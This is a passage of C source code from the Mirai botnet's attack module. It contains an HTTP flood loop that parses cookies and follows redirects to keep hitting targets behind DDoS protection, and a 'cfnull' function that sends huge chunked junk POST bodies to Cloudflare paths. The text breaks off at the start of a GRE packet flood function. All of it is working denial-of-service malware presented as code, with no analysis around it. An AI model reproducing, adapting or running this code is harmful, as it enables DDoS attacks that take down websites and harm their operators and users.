struct attack_http_state *conn;
uint32_t fake_time = time(NULL);
FD_ZERO(&fdset_rd);
FD_ZERO(&fdset_wr);
for (i = 0; i < sockets; i++)
{
conn = &(http_table[i]);
if (conn->state == HTTP_CONN_RESTART)
{
if (conn->keepalive)
conn->state = HTTP_CONN_SEND;
else
conn->state = HTTP_CONN_INIT;
}
if (conn->state == HTTP_CONN_INIT)
{
struct sockaddr_in addr = {0};
if (conn->fd != -1)
close(conn->fd);
if ((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
continue;
fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
ii = 65535;
setsockopt(conn->fd, 0, SO_RCVBUF, &ii ,sizeof(int));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = conn->dst_addr;
addr.sin_port = htons(dport);
conn->last_recv = fake_time;
conn->state = HTTP_CONN_CONNECTING;
connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
#ifdef DEBUG
printf("[http flood] fd%d started connect\n", conn->fd);
#endif
FD_SET(conn->fd, &fdset_wr);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_CONNECTING)
{
if (fake_time - conn->last_recv > 30)
{
conn->state = HTTP_CONN_INIT;
close(conn->fd);
conn->fd = -1;
continue;
}
FD_SET(conn->fd, &fdset_wr);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_SEND)
{
conn->content_length = -1;
conn->protection_type = 0;
util_zero(conn->rdbuf, HTTP_RDBUF_SIZE);
conn->rdbuf_pos = 0;
#ifdef DEBUG
//printf("[http flood] Sending http request\n");
#endif
char buf[10240];
util_zero(buf, 10240);
util_strcpy(buf + util_strlen(buf), conn->method);
util_strcpy(buf + util_strlen(buf), " ");
util_strcpy(buf + util_strlen(buf), conn->path);
util_strcpy(buf + util_strlen(buf), " HTTP/1.1\r\nUser-Agent: ");
util_strcpy(buf + util_strlen(buf), conn->user_agent);
util_strcpy(buf + util_strlen(buf), "\r\nHost: ");
util_strcpy(buf + util_strlen(buf), conn->domain);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_KEEP_ALIVE);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_KEEP_ALIVE, NULL));
table_lock_val(TABLE_ATK_KEEP_ALIVE);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_ACCEPT);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_ACCEPT, NULL));
table_lock_val(TABLE_ATK_ACCEPT);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_ACCEPT_LNG);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_ACCEPT_LNG, NULL));
table_lock_val(TABLE_ATK_ACCEPT_LNG);
util_strcpy(buf + util_strlen(buf), "\r\n");
if (postdata != NULL)
{
table_unlock_val(TABLE_ATK_CONTENT_TYPE);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_CONTENT_TYPE, NULL));
table_lock_val(TABLE_ATK_CONTENT_TYPE);
util_strcpy(buf + util_strlen(buf), "\r\n");
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_CONTENT_LENGTH_HDR, NULL));
util_strcpy(buf + util_strlen(buf), " ");
util_itoa(util_strlen(postdata), 10, buf + util_strlen(buf));
util_strcpy(buf + util_strlen(buf), "\r\n");
}
if (conn->num_cookies > 0)
{
util_strcpy(buf + util_strlen(buf), "Cookie: ");
for (ii = 0; ii < conn->num_cookies; ii++)
{
util_strcpy(buf + util_strlen(buf), conn->cookies[ii]);
util_strcpy(buf + util_strlen(buf), "; ");
}
util_strcpy(buf + util_strlen(buf), "\r\n");
}
util_strcpy(buf + util_strlen(buf), "\r\n");
if (postdata != NULL)
util_strcpy(buf + util_strlen(buf), postdata);
if (!util_strcmp(conn->method, conn->orig_method))
util_strcpy(conn->method, conn->orig_method);
#ifdef DEBUG
if (sockets == 1)
{
printf("sending buf: \"%s\"\n", buf);
}
#endif
send(conn->fd, buf, util_strlen(buf), MSG_NOSIGNAL);
conn->last_send = fake_time;
conn->state = HTTP_CONN_RECV_HEADER;
FD_SET(conn->fd, &fdset_rd);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_RECV_HEADER)
{
FD_SET(conn->fd, &fdset_rd);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_RECV_BODY)
{
FD_SET(conn->fd, &fdset_rd);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_QUEUE_RESTART)
{
FD_SET(conn->fd, &fdset_rd);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_CLOSED)
{
conn->state = HTTP_CONN_INIT;
close(conn->fd);
conn->fd = -1;
}
else
{
// NEW STATE WHO DIS
conn->state = HTTP_CONN_INIT;
close(conn->fd);
conn->fd = -1;
}
}
if (mfd == 0)
continue;
tim.tv_usec = 0;
tim.tv_sec = 1;
nfds = select(mfd, &fdset_rd, &fdset_wr, NULL, &tim);
fake_time = time(NULL);
if (nfds < 1)
continue;
for (i = 0; i < sockets; i++)
{
conn = &(http_table[i]);
if (conn->fd == -1)
continue;
if (FD_ISSET(conn->fd, &fdset_wr))
{
int err = 0;
socklen_t err_len = sizeof (err);
ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
if (err == 0 && ret == 0)
{
#ifdef DEBUG
printf("[http flood] FD%d connected.\n", conn->fd);
#endif
conn->state = HTTP_CONN_SEND;
}
else
{
#ifdef DEBUG
printf("[http flood] FD%d error while connecting = %d\n", conn->fd, err);
#endif
close(conn->fd);
conn->fd = -1;
conn->state = HTTP_CONN_INIT;
continue;
}
}
if (FD_ISSET(conn->fd, &fdset_rd))
{
if (conn->state == HTTP_CONN_RECV_HEADER)
{
int processed = 0;
util_zero(generic_memes, 10240);
if ((ret = recv(conn->fd, generic_memes, 10240, MSG_NOSIGNAL | MSG_PEEK)) < 1)
{
close(conn->fd);
conn->fd = -1;
conn->state = HTTP_CONN_INIT;
continue;
}
// we want to process a full http header (^:
if (util_memsearch(generic_memes, ret, "\r\n\r\n", 4) == -1 && ret < 10240)
continue;
generic_memes[util_memsearch(generic_memes, ret, "\r\n\r\n", 4)] = 0;
#ifdef DEBUG
if (sockets == 1)
printf("[http flood] headers: \"%s\"\n", generic_memes);
#endif
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CLOUDFLARE_NGINX, NULL)) != -1)
conn->protection_type = HTTP_PROT_CLOUDFLARE;
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_DOSARREST, NULL)) != -1)
conn->protection_type = HTTP_PROT_DOSARREST;
conn->keepalive = 0;
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CONNECTION_HDR, NULL)) != -1)
{
int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CONNECTION_HDR, NULL));
if (generic_memes[offset] == ' ')
offset++;
int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
if (nl_off != -1)
{
char *con_ptr = &(generic_memes[offset]);
if (nl_off >= 2)
nl_off -= 2;
generic_memes[offset + nl_off] = 0;
if (util_stristr(con_ptr, util_strlen(con_ptr), table_retrieve_val(TABLE_ATK_KEEP_ALIVE_HDR, NULL)))
conn->keepalive = 1;
}
}
conn->chunked = 0;
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_TRANSFER_ENCODING_HDR, NULL)) != -1)
{
int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_TRANSFER_ENCODING_HDR, NULL));
if (generic_memes[offset] == ' ')
offset++;
int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
if (nl_off != -1)
{
char *con_ptr = &(generic_memes[offset]);
if (nl_off >= 2)
nl_off -= 2;
generic_memes[offset + nl_off] = 0;
if (util_stristr(con_ptr, util_strlen(con_ptr), table_retrieve_val(TABLE_ATK_CHUNKED, NULL)))
conn->chunked = 1;
}
}
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CONTENT_LENGTH_HDR, NULL)) != -1)
{
int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_CONTENT_LENGTH_HDR, NULL));
if (generic_memes[offset] == ' ')
offset++;
int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
if (nl_off != -1)
{
char *len_ptr = &(generic_memes[offset]);
if (nl_off >= 2)
nl_off -= 2;
generic_memes[offset + nl_off] = 0;
conn->content_length = util_atoi(len_ptr, 10);
}
} else {
conn->content_length = 0;
}
processed = 0;
while (util_stristr(generic_memes + processed, ret, table_retrieve_val(TABLE_ATK_SET_COOKIE_HDR, NULL)) != -1 && conn->num_cookies < HTTP_COOKIE_MAX)
{
int offset = util_stristr(generic_memes + processed, ret, table_retrieve_val(TABLE_ATK_SET_COOKIE_HDR, NULL));
if (generic_memes[processed + offset] == ' ')
offset++;
int nl_off = util_memsearch(generic_memes + processed + offset, ret - processed - offset, "\r\n", 2);
if (nl_off != -1)
{
char *cookie_ptr = &(generic_memes[processed + offset]);
if (nl_off >= 2)
nl_off -= 2;
if (util_memsearch(generic_memes + processed + offset, ret - processed - offset, ";", 1) > 0)
nl_off = util_memsearch(generic_memes + processed + offset, ret - processed - offset, ";", 1) - 1;
generic_memes[processed + offset + nl_off] = 0;
for (ii = 0; ii < util_strlen(cookie_ptr); ii++)
if (cookie_ptr[ii] == '=')
break;
if (cookie_ptr[ii] == '=')
{
int equal_off = ii, cookie_exists = FALSE;
for (ii = 0; ii < conn->num_cookies; ii++)
if (util_strncmp(cookie_ptr, conn->cookies[ii], equal_off))
{
cookie_exists = TRUE;
break;
}
if (!cookie_exists)
{
if (util_strlen(cookie_ptr) < HTTP_COOKIE_LEN_MAX)
{
util_strcpy(conn->cookies[conn->num_cookies], cookie_ptr);
conn->num_cookies++;
}
}
}
}
processed += offset;
}
// this will still work as previous handlers will only add in null chars or similar
// and we specify the size of the string to stristr
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_LOCATION_HDR, NULL)) != -1)
{
int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_LOCATION_HDR, NULL));
if (generic_memes[offset] == ' ')
offset++;
int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
if (nl_off != -1)
{
char *loc_ptr = &(generic_memes[offset]);
if (nl_off >= 2)
nl_off -= 2;
generic_memes[offset + nl_off] = 0;
//increment it one so that it is length of the string excluding null char instead of 0-based offset
nl_off++;
if (util_memsearch(loc_ptr, nl_off, "http", 4) == 4)
{
//this is an absolute url, domain name change maybe?
ii = 7;
//http(s)
if (loc_ptr[4] == 's')
ii++;
memmove(loc_ptr, loc_ptr + ii, nl_off - ii);
ii = 0;
while (loc_ptr[ii] != 0)
{
if (loc_ptr[ii] == '/')
{
loc_ptr[ii] = 0;
break;
}
ii++;
}
// domain: loc_ptr;
// path: &(loc_ptr[ii + 1]);
if (util_strlen(loc_ptr) > 0 && util_strlen(loc_ptr) < HTTP_DOMAIN_MAX)
util_strcpy(conn->domain, loc_ptr);
if (util_strlen(&(loc_ptr[ii + 1])) < HTTP_PATH_MAX)
{
util_zero(conn->path + 1, HTTP_PATH_MAX - 1);
if (util_strlen(&(loc_ptr[ii + 1])) > 0)
util_strcpy(conn->path + 1, &(loc_ptr[ii + 1]));
}
}
else if (loc_ptr[0] == '/')
{
//handle relative url
util_zero(conn->path + 1, HTTP_PATH_MAX - 1);
if (util_strlen(&(loc_ptr[ii + 1])) > 0 && util_strlen(&(loc_ptr[ii + 1])) < HTTP_PATH_MAX)
util_strcpy(conn->path + 1, &(loc_ptr[ii + 1]));
}
conn->state = HTTP_CONN_RESTART;
continue;
}
}
if (util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_REFRESH_HDR, NULL)) != -1)
{
int offset = util_stristr(generic_memes, ret, table_retrieve_val(TABLE_ATK_REFRESH_HDR, NULL));
if (generic_memes[offset] == ' ')
offset++;
int nl_off = util_memsearch(generic_memes + offset, ret - offset, "\r\n", 2);
if (nl_off != -1)
{
char *loc_ptr = &(generic_memes[offset]);
if (nl_off >= 2)
nl_off -= 2;
generic_memes[offset + nl_off] = 0;
//increment it one so that it is length of the string excluding null char instead of 0-based offset
nl_off++;
ii = 0;
while (loc_ptr[ii] != 0 && loc_ptr[ii] >= '0' && loc_ptr[ii] <= '9')
ii++;
if (loc_ptr[ii] != 0)
{
int wait_time = 0;
loc_ptr[ii] = 0;
ii++;
if (loc_ptr[ii] == ' ')
ii++;
if (util_stristr(&(loc_ptr[ii]), util_strlen(&(loc_ptr[ii])), "url=") != -1)
ii += util_stristr(&(loc_ptr[ii]), util_strlen(&(loc_ptr[ii])), "url=");
if (loc_ptr[ii] == '"')
{
ii++;
//yes its ugly, but i dont care
if ((&(loc_ptr[ii]))[util_strlen(&(loc_ptr[ii])) - 1] == '"')
(&(loc_ptr[ii]))[util_strlen(&(loc_ptr[ii])) - 1] = 0;
}
wait_time = util_atoi(loc_ptr, 10);
//YOLO LOL
while (wait_time > 0 && wait_time < 10 && fake_time + wait_time > time(NULL))
sleep(1);
loc_ptr = &(loc_ptr[ii]);
if (util_stristr(loc_ptr, util_strlen(loc_ptr), "http") == 4)
{
//this is an absolute url, domain name change maybe?
ii = 7;
//http(s)
if (loc_ptr[4] == 's')
ii++;
memmove(loc_ptr, loc_ptr + ii, nl_off - ii);
ii = 0;
while (loc_ptr[ii] != 0)
{
if (loc_ptr[ii] == '/')
{
loc_ptr[ii] = 0;
break;
}
ii++;
}
// domain: loc_ptr;
// path: &(loc_ptr[ii + 1]);
if (util_strlen(loc_ptr) > 0 && util_strlen(loc_ptr) < HTTP_DOMAIN_MAX)
util_strcpy(conn->domain, loc_ptr);
if (util_strlen(&(loc_ptr[ii + 1])) < HTTP_PATH_MAX)
{
util_zero(conn->path + 1, HTTP_PATH_MAX - 1);
if (util_strlen(&(loc_ptr[ii + 1])) > 0)
util_strcpy(conn->path + 1, &(loc_ptr[ii + 1]));
}
}
else if (loc_ptr[0] == '/')
{
//handle relative url
if (util_strlen(&(loc_ptr[ii + 1])) < HTTP_PATH_MAX)
{
util_zero(conn->path + 1, HTTP_PATH_MAX - 1);
if (util_strlen(&(loc_ptr[ii + 1])) > 0)
util_strcpy(conn->path + 1, &(loc_ptr[ii + 1]));
}
}
strcpy(conn->method, "GET");
// queue the state up for the next time
conn->state = HTTP_CONN_QUEUE_RESTART;
continue;
}
}
}
// actually pull the content from the buffer that we processed via MSG_PEEK
processed = util_memsearch(generic_memes, ret, "\r\n\r\n", 4);
if (util_strcmp(conn->method, "POST") || util_strcmp(conn->method, "GET"))
conn->state = HTTP_CONN_RECV_BODY;
else if (ret > processed)
conn->state = HTTP_CONN_QUEUE_RESTART;
else
conn->state = HTTP_CONN_RESTART;
ret = recv(conn->fd, generic_memes, processed, MSG_NOSIGNAL);
} else if (conn->state == HTTP_CONN_RECV_BODY) {
while (TRUE)
{
// spooky doods changed state
if (conn->state != HTTP_CONN_RECV_BODY)
{
break;
}
if (conn->rdbuf_pos == HTTP_RDBUF_SIZE)
{
memmove(conn->rdbuf, conn->rdbuf + HTTP_HACK_DRAIN, HTTP_RDBUF_SIZE - HTTP_HACK_DRAIN);
conn->rdbuf_pos -= HTTP_HACK_DRAIN;
}
errno = 0;
ret = recv(conn->fd, conn->rdbuf + conn->rdbuf_pos, HTTP_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
if (ret == 0)
{
#ifdef DEBUG
printf("[http flood] FD%d connection gracefully closed\n", conn->fd);
#endif
errno = ECONNRESET;
ret = -1; // Fall through to closing connection below
}
if (ret == -1)
{
if (errno != EAGAIN && errno != EWOULDBLOCK)
{
#ifdef DEBUG
printf("[http flood] FD%d lost connection\n", conn->fd);
#endif
close(conn->fd);
conn->fd = -1;
conn->state = HTTP_CONN_INIT;
}
break;
}
conn->rdbuf_pos += ret;
conn->last_recv = fake_time;
while (TRUE)
{
int consumed = 0;
if (conn->content_length > 0)
{
consumed = conn->content_length > conn->rdbuf_pos ? conn->rdbuf_pos : conn->content_length;
conn->content_length -= consumed;
if (conn->protection_type == HTTP_PROT_DOSARREST)
{
// we specifically want this to be case sensitive
if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, table_retrieve_val(TABLE_ATK_SET_COOKIE, NULL), 11) != -1)
{
int start_pos = util_memsearch(conn->rdbuf, conn->rdbuf_pos, table_retrieve_val(TABLE_ATK_SET_COOKIE, NULL), 11);
int end_pos = util_memsearch(&(conn->rdbuf[start_pos]), conn->rdbuf_pos - start_pos, "'", 1);
conn->rdbuf[start_pos + (end_pos - 1)] = 0;
if (conn->num_cookies < HTTP_COOKIE_MAX && util_strlen(&(conn->rdbuf[start_pos])) < HTTP_COOKIE_LEN_MAX)
{
util_strcpy(conn->cookies[conn->num_cookies], &(conn->rdbuf[start_pos]));
util_strcpy(conn->cookies[conn->num_cookies] + util_strlen(conn->cookies[conn->num_cookies]), "=");
start_pos += end_pos + 3;
end_pos = util_memsearch(&(conn->rdbuf[start_pos]), conn->rdbuf_pos - start_pos, "'", 1);
conn->rdbuf[start_pos + (end_pos - 1)] = 0;
util_strcpy(conn->cookies[conn->num_cookies] + util_strlen(conn->cookies[conn->num_cookies]), &(conn->rdbuf[start_pos]));
conn->num_cookies++;
}
conn->content_length = -1;
conn->state = HTTP_CONN_QUEUE_RESTART;
break;
}
}
}
if (conn->content_length == 0)
{
if (conn->chunked == 1)
{
if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, "\r\n", 2) != -1)
{
int new_line_pos = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "\r\n", 2);
conn->rdbuf[new_line_pos - 2] = 0;
if (util_memsearch(conn->rdbuf, new_line_pos, ";", 1) != -1)
conn->rdbuf[util_memsearch(conn->rdbuf, new_line_pos, ";", 1)] = 0;
int chunklen = util_atoi(conn->rdbuf, 16);
if (chunklen == 0)
{
conn->state = HTTP_CONN_RESTART;
break;
}
conn->content_length = chunklen + 2;
consumed = new_line_pos;
}
} else {
// get rid of any extra in the buf before we move on...
conn->content_length = conn->rdbuf_pos - consumed;
if (conn->content_length == 0)
{
conn->state = HTTP_CONN_RESTART;
break;
}
}
}
if (consumed == 0)
break;
else
{
conn->rdbuf_pos -= consumed;
memmove(conn->rdbuf, conn->rdbuf + consumed, conn->rdbuf_pos);
conn->rdbuf[conn->rdbuf_pos] = 0;
if (conn->rdbuf_pos == 0)
break;
}
}
}
} else if (conn->state == HTTP_CONN_QUEUE_RESTART) {
while(TRUE)
{
errno = 0;
ret = recv(conn->fd, generic_memes, 10240, MSG_NOSIGNAL);
if (ret == 0)
{
#ifdef DEBUG
printf("[http flood] HTTP_CONN_QUEUE_RESTART FD%d connection gracefully closed\n", conn->fd);
#endif
errno = ECONNRESET;
ret = -1; // Fall through to closing connection below
}
if (ret == -1)
{
if (errno != EAGAIN && errno != EWOULDBLOCK)
{
#ifdef DEBUG
printf("[http flood] HTTP_CONN_QUEUE_RESTART FD%d lost connection\n", conn->fd);
#endif
close(conn->fd);
conn->fd = -1;
conn->state = HTTP_CONN_INIT;
}
break;
}
}
if (conn->state != HTTP_CONN_INIT)
conn->state = HTTP_CONN_RESTART;
}
}
}
// handle any sockets that didnt return from select here
// also handle timeout on HTTP_CONN_QUEUE_RESTART just in case there was no other data to be read (^: (usually this will never happen)
#ifdef DEBUG
if (sockets == 1)
{
printf("debug mode sleep\n");
sleep(1);
}
#endif
}
}
void attack_app_cfnull(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
{
int i, ii, rfd, ret = 0;
struct attack_cfnull_state *http_table = NULL;
char *domain = attack_get_opt_str(opts_len, opts, ATK_OPT_DOMAIN, NULL);
int sockets = attack_get_opt_int(opts_len, opts, ATK_OPT_CONNS, 1);
char generic_memes[10241] = {0};
if (domain == NULL)
return;
if (util_strlen(domain) > HTTP_DOMAIN_MAX - 1)
return;
if (sockets > HTTP_CONNECTION_MAX)
sockets = HTTP_CONNECTION_MAX;
http_table = calloc(sockets, sizeof(struct attack_cfnull_state));
for (i = 0; i < sockets; i++)
{
http_table[i].state = HTTP_CONN_INIT;
http_table[i].fd = -1;
http_table[i].dst_addr = targs[i % targs_len].addr;
util_strcpy(http_table[i].domain, domain);
if (targs[i % targs_len].netmask < 32)
http_table[i].dst_addr = htonl(ntohl(targs[i % targs_len].addr) + (((uint32_t)rand_next()) >> targs[i % targs_len].netmask));
switch(rand_next() % 5)
{
case 0:
table_unlock_val(TABLE_HTTP_ONE);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_ONE, NULL));
table_lock_val(TABLE_HTTP_ONE);
break;
case 1:
table_unlock_val(TABLE_HTTP_TWO);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_TWO, NULL));
table_lock_val(TABLE_HTTP_TWO);
break;
case 2:
table_unlock_val(TABLE_HTTP_THREE);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_THREE, NULL));
table_lock_val(TABLE_HTTP_THREE);
break;
case 3:
table_unlock_val(TABLE_HTTP_FOUR);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_FOUR, NULL));
table_lock_val(TABLE_HTTP_FOUR);
break;
case 4:
table_unlock_val(TABLE_HTTP_FIVE);
util_strcpy(http_table[i].user_agent, table_retrieve_val(TABLE_HTTP_FIVE, NULL));
table_lock_val(TABLE_HTTP_FIVE);
break;
}
}
while(TRUE)
{
fd_set fdset_rd, fdset_wr;
int mfd = 0, nfds;
struct timeval tim;
struct attack_cfnull_state *conn;
uint32_t fake_time = time(NULL);
FD_ZERO(&fdset_rd);
FD_ZERO(&fdset_wr);
for (i = 0; i < sockets; i++)
{
conn = &(http_table[i]);
if (conn->state == HTTP_CONN_RESTART)
{
conn->state = HTTP_CONN_INIT;
}
if (conn->state == HTTP_CONN_INIT)
{
struct sockaddr_in addr = {0};
if (conn->fd != -1)
close(conn->fd);
if ((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
continue;
fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
ii = 65535;
setsockopt(conn->fd, 0, SO_RCVBUF, &ii ,sizeof(int));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = conn->dst_addr;
addr.sin_port = htons(80);
conn->last_recv = fake_time;
conn->state = HTTP_CONN_CONNECTING;
connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
#ifdef DEBUG
printf("[http flood] fd%d started connect\n", conn->fd);
#endif
FD_SET(conn->fd, &fdset_wr);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_CONNECTING)
{
if (fake_time - conn->last_recv > 30)
{
conn->state = HTTP_CONN_INIT;
close(conn->fd);
conn->fd = -1;
continue;
}
FD_SET(conn->fd, &fdset_wr);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_SEND_HEADERS)
{
#ifdef DEBUG
//printf("[http flood] Sending http request\n");
#endif
char buf[10240];
util_zero(buf, 10240);
//util_strcpy(buf + util_strlen(buf), "POST /cdn-cgi/l/chk_captcha HTTP/1.1\r\nUser-Agent: ");
util_strcpy(buf + util_strlen(buf), "POST /cdn-cgi/");
rand_alphastr(buf + util_strlen(buf), 16);
util_strcpy(buf + util_strlen(buf), " HTTP/1.1\r\nUser-Agent: ");
util_strcpy(buf + util_strlen(buf), conn->user_agent);
util_strcpy(buf + util_strlen(buf), "\r\nHost: ");
util_strcpy(buf + util_strlen(buf), conn->domain);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_KEEP_ALIVE);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_KEEP_ALIVE, NULL));
table_lock_val(TABLE_ATK_KEEP_ALIVE);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_ACCEPT);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_ACCEPT, NULL));
table_lock_val(TABLE_ATK_ACCEPT);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_ACCEPT_LNG);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_ACCEPT_LNG, NULL));
table_lock_val(TABLE_ATK_ACCEPT_LNG);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_CONTENT_TYPE);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_CONTENT_TYPE, NULL));
table_lock_val(TABLE_ATK_CONTENT_TYPE);
util_strcpy(buf + util_strlen(buf), "\r\n");
table_unlock_val(TABLE_ATK_TRANSFER_ENCODING_HDR);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_TRANSFER_ENCODING_HDR, NULL));
table_lock_val(TABLE_ATK_TRANSFER_ENCODING_HDR);
util_strcpy(buf + util_strlen(buf), " ");
table_unlock_val(TABLE_ATK_CHUNKED);
util_strcpy(buf + util_strlen(buf), table_retrieve_val(TABLE_ATK_CHUNKED, NULL));
table_lock_val(TABLE_ATK_CHUNKED);
util_strcpy(buf + util_strlen(buf), "\r\n");
util_strcpy(buf + util_strlen(buf), "\r\n");
conn->to_send = (80 * 1024 * 1024);
#ifdef DEBUG
if (sockets == 1)
{
printf("sending buf: \"%s\"\n", buf);
}
#endif
send(conn->fd, buf, util_strlen(buf), MSG_NOSIGNAL);
conn->last_send = fake_time;
conn->state = HTTP_CONN_SEND_JUNK;
FD_SET(conn->fd, &fdset_wr);
FD_SET(conn->fd, &fdset_rd);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_SEND_JUNK)
{
int sent = 0;
char rndbuf[1025] = {0};
util_zero(rndbuf, 1025);
rand_alphastr(rndbuf, 1024);
if (conn->to_send <= 0)
{
send(conn->fd, "0\r\n", 3, MSG_NOSIGNAL);
} else {
// EZZZZZZZZZ HACKS
if (conn->to_send < 1024)
rndbuf[conn->to_send] = 0;
if ((conn->to_send >= 1024 && (conn->to_send % 1024) == 0))
{
char szbuf[4] = {0};
util_zero(szbuf, 4);
util_itoa(1024, 16, szbuf);
send(conn->fd, szbuf, util_strlen(szbuf), MSG_NOSIGNAL);
send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
}
if ((sent = send(conn->fd, rndbuf, util_strlen(rndbuf), MSG_NOSIGNAL)) == -1)
{
conn->state = HTTP_CONN_RESTART;
continue;
}
// if our local send buffer is full, slow down. no need to rush (^:
if (sent != util_strlen(rndbuf))
{
conn->state = HTTP_CONN_SNDBUF_WAIT;
}
conn->to_send -= sent;
FD_SET(conn->fd, &fdset_wr);
}
conn->last_send = fake_time;
FD_SET(conn->fd, &fdset_rd);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else if (conn->state == HTTP_CONN_SNDBUF_WAIT)
{
FD_SET(conn->fd, &fdset_wr);
if (conn->fd > mfd)
mfd = conn->fd + 1;
}
else
{
// NEW STATE WHO DIS
conn->state = HTTP_CONN_INIT;
close(conn->fd);
conn->fd = -1;
}
}
if (mfd == 0)
continue;
tim.tv_usec = 0;
tim.tv_sec = 1;
nfds = select(mfd, &fdset_rd, &fdset_wr, NULL, &tim);
fake_time = time(NULL);
if (nfds < 1)
continue;
for (i = 0; i < sockets; i++)
{
conn = &(http_table[i]);
if (conn->fd == -1)
continue;
if (FD_ISSET(conn->fd, &fdset_wr))
{
if (conn->state == HTTP_CONN_CONNECTING)
{
int err = 0;
socklen_t err_len = sizeof (err);
ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
if (err == 0 && ret == 0)
{
#ifdef DEBUG
printf("[http flood] FD%d connected.\n", conn->fd);
#endif
conn->state = HTTP_CONN_SEND;
}
else
{
#ifdef DEBUG
printf("[http flood] FD%d error while connecting = %d\n", conn->fd, err);
#endif
close(conn->fd);
conn->fd = -1;
conn->state = HTTP_CONN_INIT;
continue;
}
}
else if (conn->state == HTTP_CONN_SNDBUF_WAIT)
{
conn->state = HTTP_CONN_SEND_JUNK;
}
}
if (FD_ISSET(conn->fd, &fdset_rd))
{
// if we get any sort of headers or error code then punt it.
// we really dont care about any content we get
conn->state = HTTP_CONN_RESTART;
}
}
// handle any sockets that didnt return from select here
// also handle timeout on HTTP_CONN_QUEUE_RESTART just in case there was no other data to be read (^: (usually this will never happen)
#ifdef DEBUG
if (sockets == 1)
{
printf("debug mode sleep\n");
sleep(1);
}
#endif
}
}
================================================
FILE: mirai/bot/attack_gre.c
================================================
#define _GNU_SOURCE
#ifdef DEBUG
#include <stdio.h>
#endif
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/ip.h>
#include <linux/if_ether.h>
#include <errno.h>
#include "includes.h"
#include "attack.h"
#include "protocol.h"
#include "util.h"
#include "checksum.h"
#include "rand.h"
void attack_gre_ip(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
{
int i, fd;
char **pkts = calloc(targs_len, sizeof (char *));
uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
